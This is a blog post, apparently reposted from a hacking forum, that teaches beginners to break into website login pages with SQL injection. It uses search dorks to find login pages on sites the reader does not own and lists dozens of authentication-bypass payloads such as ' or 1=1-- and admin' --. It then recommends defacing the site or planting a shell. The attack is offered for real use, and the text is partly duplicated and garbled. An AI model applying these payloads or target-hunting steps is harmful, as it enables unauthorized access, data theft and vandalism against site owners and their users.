Bypassing Login pages on websites using SQL injectable queries
Level: Beginners and Intermediate
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
Code:
Username: admin
Password: ‘ or ‘1’=’1How does it happen? Look at the code when we execute that query
PHP Code:
SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’ The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
Code:
http://pastebin.com/ZjxpivV3Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
Code:
Username: admin
Password: ' or 0=0 --Here's a list of queried passwords you can use to hopefully inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website.
NOTE: HackingPeeps Will Not Be Responsible For Any Damages Caused By You.
No comments:
Post a Comment